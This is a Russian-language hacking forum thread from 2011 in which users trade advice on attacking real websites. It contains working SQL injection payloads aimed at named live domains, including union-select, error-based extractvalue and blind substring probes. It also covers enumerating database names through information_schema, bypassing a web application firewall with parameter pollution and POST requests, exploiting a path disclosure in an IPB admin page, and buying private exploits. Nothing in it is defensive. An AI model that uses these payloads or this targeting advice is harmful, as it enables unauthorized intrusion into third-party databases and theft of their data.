Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    есть вопрос:
    собственно найти путь на сайте,всё перепробовал сайт на Windows NT
    знаю,что только mysql установлен в C:\Program Files\MySQL\MySQL Server 5.1\ и могу прочитать C:\Program Files\MySQL\MySQL Server 5.1\my.ini
    как ещё можно узнать где лежит дира с самим сайтом?
     
  2. maisonduweb

    maisonduweb New Member

    Joined:
    20 Sep 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    есть ли уязвимость в это коде (perl) :

    if ( $section eq "view_file" ) {
    check_user();

    $file = $q->param('id');

    my $statement = 'SELECT nid,filename, file FROM files WHERE id = ?';
    $sth = $dbh->prepare($statement) or die print "Couldn't prepare statement: $DBI::errstr; stopped";
    $sth->execute($file) or die print "Couldn't execute statement: $DBI::errstr; stopped";
    while ( my $ref = $sth->fetchrow_hashref() ) { $nid = $ref->{'nid'}; $name = $ref->{'filename'}; $filename = $ref->{'file'}; }

    $statemente = 'SELECT notes.call FROM notes WHERE id = ?';
    $sth = $dbh->prepare($statemente) or die "Couldn't prepare statement: $DBI::errstr; stopped";
    $sth->execute($nid) or die "Couldn't execute statement: $DBI::errstr; stopped";
    while ( my $ref = $sth->fetchrow_hashref() ) {
    $call = $ref->{'call'};
    }

    $statement = 'SELECT username FROM calls WHERE id = ?';
    $sth = $dbh->prepare($statement) or die "Couldn't prepare statement: $DBI::errstr; stopped";
    $sth->execute($call) or die "Couldn't execute statement: $DBI::errstr; stopped";
    while ( my $ref = $sth->fetchrow_hashref() ) {
    die_nice("Sorry you do not have access to this file") if $ref->{'username'} ne "$Cookies{'id'}";
    }

    print qq~Content-Disposition: attachment; filename="$name"\n~;
    print "Content-Type: application/octet-stream\n\n";

    if ( defined $file && $file ne "" ) {
    open( LOCAL, "<$filename" ) or die $!;
    while (<LOCAL>) {
    print;
    }
    close(LOCAL);
    }
    }

    все время открывается сам файл с ошибкой внутри в строке while (<LOCAL>) {
     
  3. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Первым делом, так и сделал, но результат не оправдал ожидания. Вопрос остаётся актуальным!
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    поищи php.ini (тут где то была тема с путями для брута)
     
    _________________________
  5. Systematis

    Systematis New Member

    Joined:
    17 Sep 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как определить название БД, к которым относятся найденные таблицы?
    Т.е название таблицы есть (в моём случае user), но если в запросе указать просто "from user", то вываливается ошибка Table doesn't exist.
    Запрос ' and extractvalue(rand(),concat(0x3a,version(),0x3a,database()))-- 1 выводит неверное название БД.

    MySQL 5.1.56, если что.
     
    #17905 Systematis, 20 Sep 2011
    Last edited: 20 Sep 2011
  6. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    select group_concat(table_schema) from information_schema.tables where table_name='user'
    если magic_quotes=on(экранирование спец символов), то надо перевести user в hex и писать table_name=0x75736572 вместо table_name='user'

    Через запятую вывалит названия баз не больше первых 1кб(т.е. если баз дофига, то group_concat может вернуть не все).

    Или на примере верхних двух постов
     
    #17906 Melfis, 20 Sep 2011
    Last edited: 20 Sep 2011
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Подскажите, как крутить MS Access http://www.kzr.spb.ru/news-temp.asp?id=-1' ?
     
  8. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Друззя, снова я. Сразу к делу:

    Code:
    http://site.pl/humor.php?id=17%20and%201=0%00union select group_concat(@@version),2,3,4,5,6,7,8,9,0 --
    Вот до чего приблизительно дошел, но проблема в том, что union блочится в какой-то момент, и нам по-польски предлагают пойти куда подальше. Как видите, null byte пробовал, ничего. Чем еще можно попробовать?

    upd: То есть, если в адресе есть union или ";", редирект на отдельную страничку с угрозами скорой расправы.
     
    #17908 rad_scorp, 21 Sep 2011
    Last edited: 21 Sep 2011
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это WAF.
    Узнай что именно попадает под WAF, UNION или же UNION SELECT или же что-то еще.
    И пробуй обойти, способов много.
    Погугли на тему WAF Bypass, так же от Ефтеева есть презентация с некоторыми способами обхода WAF.
    Как варианты попробуй:
     
  10. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Только учу sql injection.
    Нашел сайт, вбил в поиск - 123' выдало

    смущает IN BOOLEAN MODE (да...sql надо подучить) принцип тот же самый?
     
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    http://www.kzr.spb.ru/news-temp.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+msysaccessobjects
     
    1 person likes this.
  12. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Да, это waf. Блокирует слово union "as such", под любым соусом в GET. Ищу возможность его как-то разбить на части, но похоже это невозможно.

    Вот что можно:
    Code:
    like 
    concat 
    group_concat
    version 
    id=(1)
    symbols: # -- /**/ ()
    А это нельзя:

    Code:
    union
    select
    update
    insert
    
    symbols: ; ,
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    попробуй post'ом
     
    _________________________
  14. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Форум IPB 3.2.0,нашел раскрытие пути
    Code:
    Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248 
    По такому адресу:
    Code:
    _http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
    Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)

    Заранее спс,за совет.
     
    #17914 alerondel, 22 Sep 2011
    Last edited by a moderator: 23 Sep 2011
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну нахсел раскрытие..и что дальше? это не относится к багам которые дают доступ к БД..ищи сплоиты под эту версию форума..или баги приват покупай
     
    #17915 Gorev, 22 Sep 2011
    Last edited by a moderator: 23 Sep 2011
    1 person likes this.
  16. rad_scorp

    rad_scorp New Member

    Joined:
    9 Sep 2011
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Пробовал, даже куками, кажется.

    Пробовал HPP (или HPF, я пока еще не разбираюсь ;)). В таком виде: id=5 and 1=0 un&id=ion итд, может, конечно, не так составил, но не заработало.

    Хорошо забаррикадировались, собаки. ;) На самом деле, насколько я могу судить, хороший, годный waf. Он анализирует строчку REQUEST_URI, я так подозреваю, потому что &asd=union вываливает ошибку тоже.
     
  17. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?
     
  18. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Только blind.
    http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)
     
    1 person likes this.
  19. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Если белая страница, или вырубает на главную, значит запрос неверный, что тут непонятного??
    Поля подобрать можно :D их 14 :)
     
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    всё ещё нуждаюсь в ответе как найти?
     
Thread Status:
Not open for further replies.